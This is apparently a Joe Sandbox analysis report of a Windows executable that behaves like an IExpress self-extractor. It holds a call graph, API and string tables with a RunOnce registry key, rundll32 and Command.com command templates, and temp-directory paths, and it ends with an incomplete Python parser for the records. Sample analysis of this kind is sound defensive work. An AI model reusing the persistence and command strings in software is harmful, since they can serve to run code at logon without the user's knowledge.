2199->2634 2644 7ff6975a494c 2201->2644 2203->2171 2206 7ff6975a6214 2205->2206 2207 7ff6975a624c LocalFree LocalFree 2206->2207 2208 7ff6975a6229 SetFileAttributesA DeleteFileA 2206->2208 2215 7ff6975a6273 2206->2215 2207->2206 2208->2207 2209 7ff6975a6311 2210 7ff6975a6387 2209->2210 2212 7ff6975a632d RegOpenKeyExA 2209->2212 2211 7ff6975a8470 7 API calls 2210->2211 2213 7ff6975a2ce8 2211->2213 2212->2210 2214 7ff6975a635e RegDeleteValueA RegCloseKey 2212->2214 2213->2096 2213->2104 2219 7ff6975a2318 2213->2219 2214->2210 2215->2209 2216 7ff6975a62f4 SetCurrentDirectoryA 2215->2216 2217 7ff6975a7c40 4 API calls 
2215->2217 2218 7ff6975a204c 16 API calls 2216->2218 2217->2216 2218->2209 2220 7ff6975a2330 2219->2220 2221 7ff6975a2447 2219->2221 2222 7ff6975a23cb RegOpenKeyExA 2220->2222 2223 7ff6975a233a 2220->2223 2893 7ff6975a2244 GetWindowsDirectoryA 2221->2893 2225 7ff6975a23c3 2222->2225 2226 7ff6975a23fe RegQueryInfoKeyA 2222->2226 2223->2225 2227 7ff6975a234a RegOpenKeyExA 2223->2227 2225->2104 2228 7ff6975a23a8 RegCloseKey 2226->2228 2227->2225 2229 7ff6975a237d RegQueryValueExA 2227->2229 2228->2225 2229->2228 2231 7ff6975a5024 2230->2231 2232 7ff6975a4e49 LoadStringA 2230->2232 2235 7ff6975a8470 7 API calls 2231->2235 2233 7ff6975a4e73 2232->2233 2234 7ff6975a4eb5 2232->2234 2238 7ff6975a7f04 13 API calls 2233->2238 2236 7ff6975a4f31 2234->2236 2241 7ff6975a4ec1 LocalAlloc 2234->2241 2237 7ff6975a2d59 2235->2237 2243 7ff6975a4f8e LocalAlloc 2236->2243 2244 7ff6975a4f44 LocalAlloc 2236->2244 2237->2096 2237->2105 2239 7ff6975a4e78 2238->2239 2240 7ff6975a4e81 MessageBoxA 2239->2240 2242 7ff6975a7e34 2 API calls 2239->2242 2240->2231 2241->2231 2250 7ff6975a4f14 2241->2250 2242->2240 2243->2231 2246 7ff6975a4f2c 2243->2246 2244->2231 2251 7ff6975a4f79 2244->2251 2249 7ff6975a4fbc MessageBeep 2246->2249 2253 7ff6975a7f04 13 API calls 2249->2253 2254 7ff6975a114c _vsnprintf 2250->2254 2252 7ff6975a114c _vsnprintf 2251->2252 2252->2246 2255 7ff6975a4fd3 2253->2255 2254->2246 2256 7ff6975a4fdc MessageBoxA LocalFree 2255->2256 2257 7ff6975a7e34 2 API calls 2255->2257 2256->2231 2257->2256 2260 7ff6975a1c6f LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2259->2260 2261 7ff6975a1c4c 2259->2261 2260->2261 2262 7ff6975a1cec ExitWindowsEx 2260->2262 2263 7ff6975a4dcc 24 API calls 2261->2263 2262->2261 2264 7ff6975a1c68 2262->2264 2263->2264 2265 7ff6975a8470 7 API calls 2264->2265 2266 7ff6975a1d1a 2265->2266 2266->2096 2268 7ff6975a509b 2267->2268 2269 7ff6975a2e43 2267->2269 2268->2269 2270 7ff6975a50a4 FindResourceA LoadResource LockResource 2268->2270 2269->2118 
2269->2134 2270->2269 2271 7ff6975a50e3 memcpy_s FreeResource 2270->2271 2271->2269 2273 7ff6975a7566 2272->2273 2282 7ff6975a70f2 2272->2282 2274 7ff6975a8470 7 API calls 2273->2274 2276 7ff6975a2fb1 2274->2276 2275 7ff6975a71ca 2275->2273 2278 7ff6975a71e7 GetModuleFileNameA 2275->2278 2276->2134 2276->2135 2277 7ff6975a711d CharNextA 2277->2282 2279 7ff6975a720f 2278->2279 2280 7ff6975a721c 2278->2280 2364 7ff6975a7d68 2279->2364 2280->2273 2282->2273 2282->2275 2282->2277 2283 7ff6975a76f1 2282->2283 2286 7ff6975a7238 CharUpperA 2282->2286 2292 7ff6975a739d CharUpperA 2282->2292 2293 7ff6975a7346 CompareStringA 2282->2293 2294 7ff6975a73fb CharUpperA 2282->2294 2295 7ff6975a72d0 CharUpperA 2282->2295 2296 7ff6975a7492 CharUpperA 2282->2296 2297 7ff6975a7ce8 IsDBCSLeadByte CharNextA 2282->2297 2369 7ff6975a7ba8 2282->2369 2373 7ff6975a8648 RtlCaptureContext RtlLookupFunctionEntry 2283->2373 2286->2282 2287 7ff6975a766f 2286->2287 2288 7ff6975a4dcc 24 API calls 2287->2288 2289 7ff6975a7692 2288->2289 2290 7ff6975a769e CloseHandle 2289->2290 2291 7ff6975a76aa ExitProcess 2289->2291 2290->2291 2292->2282 2293->2282 2294->2282 2295->2282 2296->2282 2297->2282 2300 7ff6975a8479 2299->2300 2301 7ff6975a2cd4 2300->2301 2302 7ff6975a84d0 RtlCaptureContext RtlLookupFunctionEntry 2300->2302 2301->2096 2301->2159 2303 7ff6975a8515 RtlVirtualUnwind 2302->2303 2304 7ff6975a8557 2302->2304 2303->2304 2379 7ff6975a8494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2304->2379 2308 7ff6975a2213 2307->2308 2311 7ff6975a2086 2307->2311 2309 7ff6975a8470 7 API calls 2308->2309 2310 7ff6975a2222 2309->2310 2310->2149 2312 7ff6975a20dc FindFirstFileA 2311->2312 2312->2308 2319 7ff6975a20fe 2312->2319 2313 7ff6975a21a3 2317 7ff6975a21b4 SetFileAttributesA DeleteFileA 2313->2317 2314 7ff6975a2138 lstrcmpA 2315 7ff6975a21d9 FindNextFileA 2314->2315 2316 7ff6975a2158 lstrcmpA 2314->2316 2318 7ff6975a21f5 FindClose RemoveDirectoryA 2315->2318 

                                                          Callgraph


                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                                                          • String ID: 52352352352$<None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                          • API String ID: 2679723528-157190445
                                                          • Opcode ID: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                          • Instruction ID: 148114e4ceea375a9e08866cd2c0a0db8f9b2560fa6354b38cf00a7bd61349e3
                                                          • Opcode Fuzzy Hash: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                          • Instruction Fuzzy Hash: 5602A171A0878286FBF89B54E8406BA7BA0FF847E4F5441B5DA4E83694DF3CE945C720

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                          • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                          • API String ID: 178549006-607953301
                                                          • Opcode ID: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                          • Instruction ID: d681a4fad019164715e56b109edabc687695848ea498c9625e710586c156d20a
                                                          • Opcode Fuzzy Hash: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                          • Instruction Fuzzy Hash: F481A632B08B8687EBA48F21E8402B9BBA4FB89BE4F4451B5DA4E87754DF3CD505C750

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                          • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                          • API String ID: 383838535-3614570713
                                                          • Opcode ID: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                          • Instruction ID: d75d3ae7e22d2d7f82a9d11e80388bf0773fa02a3fd47cf894ebde2de7870acf
                                                          • Opcode Fuzzy Hash: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                          • Instruction Fuzzy Hash: 2EE19E62A0878685EFB98F20A4002BA77B1FB457E4F9441B6DA4DC7B95DF3DD909C320

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                                          • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                          • API String ID: 3973824516-1370313076
                                                          • Opcode ID: 10e5a1de4704b11e57effca18463699361e379a5f0e914d5799a333e44746406
                                                          • Instruction ID: fa6cb5e92e48863b18bbcf1c2fa2adb96950e12ba4cadc71f2d2d6dd0b51c9ef
                                                          • Opcode Fuzzy Hash: 10e5a1de4704b11e57effca18463699361e379a5f0e914d5799a333e44746406
                                                          • Instruction Fuzzy Hash: 91D1B332A18682C6EBB89B20E4506BA77A1FF957E0F5440B5DA4EC3695DF3DE805C720

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                                          • String ID: $52352352352$EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK
                                                          • API String ID: 3100096412-2209769548
                                                          • Opcode ID: 56b820130d1ad660dfa8e8d0e421b62bbaab1ba59714ea7f7ec2c9c3d28285f9
                                                          • Instruction ID: 38450191463b058fb827f638a4d5305512d14637e17b0f6327e34d25e9c80083
                                                          • Opcode Fuzzy Hash: 56b820130d1ad660dfa8e8d0e421b62bbaab1ba59714ea7f7ec2c9c3d28285f9
                                                          • Instruction Fuzzy Hash: 6D817A71A0C64386FBF89B24A9017B976A0FF997E8F4040B5D94EC26A5DF7CE445CB20

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                          • API String ID: 4237285672-388467436
                                                          • Opcode ID: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                          • Instruction ID: 8def2f145f64ebfe66fc0189a31d873f90a59e23c235672768a9064cb4e3cecb
                                                          • Opcode Fuzzy Hash: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                          • Instruction Fuzzy Hash: 4FA1B836A18742C7E7B89F20E4406BABBA5FB897A4F444175DA4E83B58DF3DD405CB10

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                          • String ID: *MEMCAB$CABINET
                                                          • API String ID: 1305606123-2642027498
                                                          • Opcode ID: 167cfbe3481d2c55deda2959b4f60fab9ca519b6d8b495f465010a09c29e0748
                                                          • Instruction ID: ded3783b5183e864ac80915495cc7bba5e9866c59a275f20d0f9cbbe413259fc
                                                          • Opcode Fuzzy Hash: 167cfbe3481d2c55deda2959b4f60fab9ca519b6d8b495f465010a09c29e0748
                                                          • Instruction Fuzzy Hash: A25129B1A08B4386FBB89B10E8447B57BA0FF897A5F8481B5C94E86758DF3CE005C760

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                          • API String ID: 3010855178-2712585282
                                                          • Opcode ID: 1b568c9d80e1c16c25a8832b7560ad1fe553b1887f492639f14b46a0c907384f
                                                          • Instruction ID: 4185fcc51e4a96271564da0c91dcbb31f41c584e445783b1714163fc66efa779
                                                          • Opcode Fuzzy Hash: 1b568c9d80e1c16c25a8832b7560ad1fe553b1887f492639f14b46a0c907384f
                                                          • Instruction Fuzzy Hash: 14713B60E0C68386FBF89B21E8402B966E4FF947F8F4040B6D94EC22A5DF3DE445C660

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6975A2CE1), ref: 00007FF6975A657C
                                                          • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6975A2CE1), ref: 00007FF6975A662F
                                                          • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6975A2CE1), ref: 00007FF6975A666F
                                                            • Part of subcall function 00007FF6975A63B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF6975A2CE1), ref: 00007FF6975A6423
                                                            • Part of subcall function 00007FF6975A63B8: GetFileAttributesA.KERNELBASE ref: 00007FF6975A6432
                                                            • Part of subcall function 00007FF6975A63B8: GetTempFileNameA.KERNEL32 ref: 00007FF6975A645B
                                                            • Part of subcall function 00007FF6975A63B8: DeleteFileA.KERNEL32 ref: 00007FF6975A6473
                                                            • Part of subcall function 00007FF6975A63B8: CreateDirectoryA.KERNEL32 ref: 00007FF6975A6484
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                          • API String ID: 1979080616-1143122538
                                                          • Opcode ID: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                                          • Instruction ID: 4becc9f399a028f6c8583d98defa57b24f496e064b0c5eb266c6f74a1b73530a
                                                          • Opcode Fuzzy Hash: 46ce37abadc5027e1bb67ef9580c9553c9e3bc3d3873299fa6b8c7dc3ad8012b
                                                          • Instruction Fuzzy Hash: 86517F61E09782C5FFF99B25A8102B967A4EF497E0F9841B5C94EC3699DF7CE805C220

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                                          • String ID: @$HeapSetInformation$Kernel32.dll
                                                          • API String ID: 1302179841-1204263913
                                                          • Opcode ID: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                                          • Instruction ID: 22a6f63cfe755e48e68a19422e3d317cf1f893315ad4c3f21aa82a31909c7261
                                                          • Opcode Fuzzy Hash: d0bfb26a70778e8c6dce021e27be85d7a0cec3bff586eb98b8bfca0f5ba54e91
                                                          • Instruction Fuzzy Hash: DA315E72E0874286FBFC9B20A55227A76A0FF997E0F4441B5CA0DC229ACF7CE441C660
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                          • String ID:
                                                          • API String ID: 836429354-0
                                                          • Opcode ID: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                          • Instruction ID: 4a74b8d5c10da7e42999673362640258231c8dda2d39638897fc483733585c72
                                                          • Opcode Fuzzy Hash: 443ad30fadf752f4578cad6f697bceb18b99ad69543bd59e09de2f484cdf82b3
                                                          • Instruction Fuzzy Hash: F0519431B08B8586EF658F20D9402F87BA1FB85BE4F8481B1DA4D87698DF3CD509C360

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                                          • String ID: $52352352352
                                                          • API String ID: 2654313074-2326657022
                                                          • Opcode ID: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
                                                          • Instruction ID: 72c55d6ad2a7b3624c64a2795091306fda8e9d46cad2a5d748253d20c8de6215
                                                          • Opcode Fuzzy Hash: 00a4735194eecac90b7f23e95863fe14a5468c5ab709964e4691a7869e5d0189
                                                          • Instruction Fuzzy Hash: 99514F31E0874286EBB88B11E9442797BA1FB89BF5F5492B1DA1E87798CF3C9445C720

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                          • API String ID: 3049360512-2186971993
                                                          • Opcode ID: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                                          • Instruction ID: 444249026f4d5b3f28d5a84fe990c9ccbcd64f4d4f7e3bf977269a8b18fb67f6
                                                          • Opcode Fuzzy Hash: 88b67cf9d0802eb801fbc77634297f52a5ae07bc3bb60e3e8d3801540334588a
                                                          • Instruction Fuzzy Hash: 16513031A08A82C6EFA98B14E8543B97BA0FF957E4F4441B5CA4E87694DF3DE448C720
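                                                          The function records above (the GetSystemInfo/CreateDirectoryA record and the RunOnce record) follow one bullet layout: an APIs list with call-site addresses, a Memory Dump Source with the image base, and a Similarity block whose API ID and String ID fields join their items with "$". The following Python is an added example by the editor, not code from the Joe Sandbox report or from Joe Security: it parses those bullets into structured data, converts call sites to RVAs for pivoting into a disassembler, and tags the strings a responder would act on (IXP%03d.TMP staging directory, RunOnce key and wextract_cleanup value, PendingFileRenameOperations, *MEMCAB). The bullet grammar is inferred from this page and is an assumption; the SAMPLE_* text is constructed by copying lines from the two records named above, and the tag wording is the editor's.

```python
"""Parse Joe Sandbox function-record bullets ("APIs", "Memory Dump Source",
"Similarity") into structured data and tag responder-relevant strings.

Editor's example, not Joe Sandbox code. The bullet format is inferred from
the records on this page (an assumption); the SAMPLE_* texts are constructed
by copying lines from those records.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# "• Api.MODULE(args), ref: ADDR" or, for a callee's APIs,
# "• Part of subcall function ADDR: Api.MODULE ref: ADDR"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
KV_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

# Strings from this report's string tables and the meaning a responder reads
# into them (tag wording is the editor's, not the report's).
INDICATOR_TAGS = [
    (re.compile(r"\\IXP\d{3}\.TMP\\?$", re.I), "IXP%03d.TMP extraction directory under %TEMP%"),
    (re.compile(r"CurrentVersion\\RunOnce$", re.I), "RunOnce key: command runs once at next logon"),
    (re.compile(r"^wextract_cleanup\d+$", re.I), "wextract_cleanup RunOnce value"),
    (re.compile(r"^PendingFileRenameOperations$"), "reboot-time rename/delete queue"),
    (re.compile(r"^\*MEMCAB$"), "pseudo-filename for the resource-embedded CAB"),
]

@dataclass
class ApiRef:
    api: str
    module: str
    ref: int                      # absolute address of the call site in the dump
    args: List[str]
    caller: Optional[int] = None  # set when the call lives in a subcall function

@dataclass
class FunctionRecord:
    apis: List[ApiRef] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    api_ids: List[str] = field(default_factory=list)
    source_file: str = ""
    image_base: Optional[int] = None

def parse_record(text: str) -> FunctionRecord:
    rec = FunctionRecord()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [a for a in (m["args"] or "").split(",") if a]
            caller = int(m["caller"], 16) if m["caller"] else None
            rec.apis.append(ApiRef(m["api"], m["module"], int(m["ref"], 16), args, caller))
            continue
        m = KV_RE.match(line)
        if not m:
            continue
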